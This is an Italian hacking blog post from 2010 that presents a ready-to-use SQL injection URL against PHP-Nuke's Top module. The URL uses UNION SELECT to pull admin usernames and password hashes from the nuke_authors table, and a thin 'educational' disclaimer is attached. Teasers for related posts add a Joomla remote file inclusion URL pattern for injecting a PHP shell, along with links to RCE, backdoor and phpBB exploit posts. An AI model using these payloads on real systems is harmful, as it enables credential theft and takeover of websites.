Senza entusiasmo,non si è mai compiuto niente di grande
SQL injection PHP Nuke
Tutti ormai conoscono PHP Nuke,il famoso CMS (content manager system ovvero sistema di gestione dei contenuti) e come ogni CMS che si rispetti (ormai è difficile trovare CMS senza vulnerabilità 
) ha qualche falla 
Quella che vi presento oggi è una falla nel modulo Top.Di seguito trovate il codice 
/modules.php?name=Top&querylang=%20WHERE%201=1%20UNION+ ALL%20SELECT%200,pwd,aid,0%20FROM%20nuke_authors–
Funziona su molte versioni di PHP Nuke.Ovviamente è tutto a scopo informativo e didattico 
Michele
Condividere è sexy
Ti potrebbero interessare anche i seguenti articoli
- Fix Nuke Sentinel SQJ Injection ll sentinel non blocca delle sql injection scritte in un certo modo… Per fixarlo: Aprire...
- Log poisoning e shell injection Video tutorial che illustra come iniettare una shell PHP su un server web avente uno...
- 0day Joomla: Shell Injection http://{PAGE}/mambots/content/josowbot.content.php?mosConfig_absolute_path={SHELL} XPL:/mambots/content/josowbot.content.php?mosConfig_absolute_path= Permette di iniettare una shell in PHP nel sito web dandovi pieno...
- PHPBB Sentinel Utile script in PHP che protegge il vostro forum in phpbb dai seguenti attacchi: XSS...
- Phpbb 3.0 sql injection exploit Vulnerabilità della versione 3.0 della bulletin board phpBB. Clicca quì per il codice dell'exploit. Mi...
| Stampa l'articolo | Questo articolo è stato pubblicato da Michele il mercoledì 10 marzo 2010 alle 17:00, ed è archiviato come Hacking. Puoi seguire i commenti a questo post attraverso RSS 2.0. Puoi pubblicare un commento o segnalare un trackback dal tuo sito. |
Nessun trackback
WordPress o Blogger: questo è il problema!
circa 3 settimane fa - 3 commenti
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1172()’,5000);window.setTimeout(‘loadTwitter_1172()’,5000);window.setTimeout(‘loadFBShare_1172()’,5000);window.setTimeout(‘loadGBuzz_1172()’,5000); }); function loadDigg_1172(){ jQuery(document).ready(function($) { $(‘.dd-digg-1172′).remove();$(‘.DD_DIGG_AJAX_1172′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&title=SQL+injection+PHP+Nuke’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1172(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1172′).remove();$(‘.DD_TWITTER_AJAX_1172′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1172(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1172′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1172(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1172′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); }La prima cosa a cui pensiamo quando apriamo un blog è se usare WordPress oppure il servizio gratuito di Google,Blogger. Entrambi hanno dei
Condividere è sexy
Deluxebb <= 1.1 0day
circa 4 mesi fa - 1 commento
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1172()’,5000);window.setTimeout(‘loadTwitter_1172()’,5000);window.setTimeout(‘loadFBShare_1172()’,5000);window.setTimeout(‘loadGBuzz_1172()’,5000); }); function loadDigg_1172(){ jQuery(document).ready(function($) { $(‘.dd-digg-1172′).remove();$(‘.DD_DIGG_AJAX_1172′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&title=SQL+injection+PHP+Nuke’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1172(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1172′).remove();$(‘.DD_TWITTER_AJAX_1172′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1172(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1172′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1172(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1172′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); }E' una vulnerabilità che affligge le versione di deluxeBB uguali o inferiori alle 1.1 E' in PHP,per funzionare serve un server apache in
Condividere è sexy
0day Joomla: Shell Injection
circa 4 mesi fa - 8 commenti
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1172()’,5000);window.setTimeout(‘loadTwitter_1172()’,5000);window.setTimeout(‘loadFBShare_1172()’,5000);window.setTimeout(‘loadGBuzz_1172()’,5000); }); function loadDigg_1172(){ jQuery(document).ready(function($) { $(‘.dd-digg-1172′).remove();$(‘.DD_DIGG_AJAX_1172′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&title=SQL+injection+PHP+Nuke’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1172(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1172′).remove();$(‘.DD_TWITTER_AJAX_1172′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1172(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1172′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1172(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1172′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); } http://{PAGE}/mambots/content/josowbot.content.php?mosConfig_absolute_path={SHELL} XPL:/mambots/content/josowbot.content.php?mosConfig_absolute_path= Permette di iniettare una shell in PHP nel sito web dandovi pieno accesso ai file dell'hosting. Michele Condividere è
Condividere è sexy
RCE su applicazione PHP vulnerabile a RFI
circa 4 mesi fa - 1 commento
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1172()’,5000);window.setTimeout(‘loadTwitter_1172()’,5000);window.setTimeout(‘loadFBShare_1172()’,5000);window.setTimeout(‘loadGBuzz_1172()’,5000); }); function loadDigg_1172(){ jQuery(document).ready(function($) { $(‘.dd-digg-1172′).remove();$(‘.DD_DIGG_AJAX_1172′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&title=SQL+injection+PHP+Nuke’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1172(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1172′).remove();$(‘.DD_TWITTER_AJAX_1172′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1172(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1172′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1172(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1172′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); } Video tutorial che illustra come effettuare RCE (Remote Command Execution) su un web server su cui è presente una pagina PHP vulnerabile
Condividere è sexy
e107 0.7.11 Preview Admin news Xss
circa 5 mesi fa - 1 commento
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1172()’,5000);window.setTimeout(‘loadTwitter_1172()’,5000);window.setTimeout(‘loadFBShare_1172()’,5000);window.setTimeout(‘loadGBuzz_1172()’,5000); }); function loadDigg_1172(){ jQuery(document).ready(function($) { $(‘.dd-digg-1172′).remove();$(‘.DD_DIGG_AJAX_1172′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&title=SQL+injection+PHP+Nuke’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1172(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1172′).remove();$(‘.DD_TWITTER_AJAX_1172′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1172(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1172′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1172(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1172′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); } Questa vulnerabilità vale per la versione 0.7.11 del CMS e107 BUG: in submitnews.php le variabili $author_name, $itemtitle e $item non sono controllate,
Condividere è sexy
PHP Backdoor Version 1.5
circa 5 mesi fa - 2 commenti
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1172()’,5000);window.setTimeout(‘loadTwitter_1172()’,5000);window.setTimeout(‘loadFBShare_1172()’,5000);window.setTimeout(‘loadGBuzz_1172()’,5000); }); function loadDigg_1172(){ jQuery(document).ready(function($) { $(‘.dd-digg-1172′).remove();$(‘.DD_DIGG_AJAX_1172′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&title=SQL+injection+PHP+Nuke’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1172(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1172′).remove();$(‘.DD_TWITTER_AJAX_1172′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1172(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1172′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1172(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1172′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); }Per chi non sapesse cosa sia una Backdoor riporto la citazione di wikipedia: Le backdoor in informatica sono paragonabili a porte di servizio
Condividere è sexy
Elenco porte server
circa 5 mesi fa - Nessun commento
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1172()’,5000);window.setTimeout(‘loadTwitter_1172()’,5000);window.setTimeout(‘loadFBShare_1172()’,5000);window.setTimeout(‘loadGBuzz_1172()’,5000); }); function loadDigg_1172(){ jQuery(document).ready(function($) { $(‘.dd-digg-1172′).remove();$(‘.DD_DIGG_AJAX_1172′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&title=SQL+injection+PHP+Nuke’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1172(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1172′).remove();$(‘.DD_TWITTER_AJAX_1172′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1172(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1172′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1172(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1172′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); } Sono visibili tutte le porte con relativi protocolli keywords e descrizione. Ora non necessariamente in TUTTI i sistemi e SERVER le porte
Condividere è sexy
Phpbb 3.0 sql injection exploit
circa 5 mesi fa - 1 commento
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1172()’,5000);window.setTimeout(‘loadTwitter_1172()’,5000);window.setTimeout(‘loadFBShare_1172()’,5000);window.setTimeout(‘loadGBuzz_1172()’,5000); }); function loadDigg_1172(){ jQuery(document).ready(function($) { $(‘.dd-digg-1172′).remove();$(‘.DD_DIGG_AJAX_1172′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&title=SQL+injection+PHP+Nuke’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1172(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1172′).remove();$(‘.DD_TWITTER_AJAX_1172′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1172(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1172′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1172(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1172′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); }Vulnerabilità della versione 3.0 della bulletin board phpBB. Clicca quì per il codice dell'exploit. Mi auguro che usiate per puri scopi didattici questi
Condividere è sexy
Log poisoning e shell injection
circa 5 mesi fa - Nessun commento
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1172()’,5000);window.setTimeout(‘loadTwitter_1172()’,5000);window.setTimeout(‘loadFBShare_1172()’,5000);window.setTimeout(‘loadGBuzz_1172()’,5000); }); function loadDigg_1172(){ jQuery(document).ready(function($) { $(‘.dd-digg-1172′).remove();$(‘.DD_DIGG_AJAX_1172′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&title=SQL+injection+PHP+Nuke’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1172(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1172′).remove();$(‘.DD_TWITTER_AJAX_1172′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1172(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1172′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1172(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1172′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); }Video tutorial che illustra come iniettare una shell PHP su un server web avente uno script che effettua il logging su un file
Condividere è sexy
Fix phpBB (privmsg.php) XSS
circa 5 mesi fa - Nessun commento
jQuery(document).ready(function($) { window.setTimeout(‘loadDigg_1172()’,5000);window.setTimeout(‘loadTwitter_1172()’,5000);window.setTimeout(‘loadFBShare_1172()’,5000);window.setTimeout(‘loadGBuzz_1172()’,5000); }); function loadDigg_1172(){ jQuery(document).ready(function($) { $(‘.dd-digg-1172′).remove();$(‘.DD_DIGG_AJAX_1172′).attr(‘href’,'http://digg.com/submit?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&title=SQL+injection+PHP+Nuke’);$.getScript(‘http://widgets.digg.com/buttons.js’); }); } function loadTwitter_1172(){ jQuery(document).ready(function($) { $(‘.dd-twitter-1172′).remove();$(‘.DD_TWITTER_AJAX_1172′).attr(‘width’,’50′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘height’,’61′);$(‘.DD_TWITTER_AJAX_1172′).attr(‘src’,'http://api.tweetmeme.com/button.js?url=http://www.michelepapaleo.it/sql-injection-php-nuke/&source=ziomike2009&style=normal&service=&service_api=’); }); } function loadFBShare_1172(){ jQuery(document).ready(function($) { $(‘.dd-fbshare-1172′).remove(); $.getScript(‘http://static.ak.fbcdn.net/connect.php/js/FB.Share’); }); } function loadGBuzz_1172(){ jQuery(document).ready(function($) { $(‘.dd-gbuzz-1172′).remove();$.getScript(‘http://www.google.com/buzz/api/button.js’); }); }Per Fixare: aprire phpBB2/privmsg.php trovare questo codice: if (!($to_userdata = $db->sql_fetchrow($result))) { $error = TRUE; $error_msg = $lang['No_such_user']; sostituirlo con questo: if (
Condividere è sexy
circa 1 mese fa
roba vecchia… ma perchè postate ste scemenze di 10 anni fa?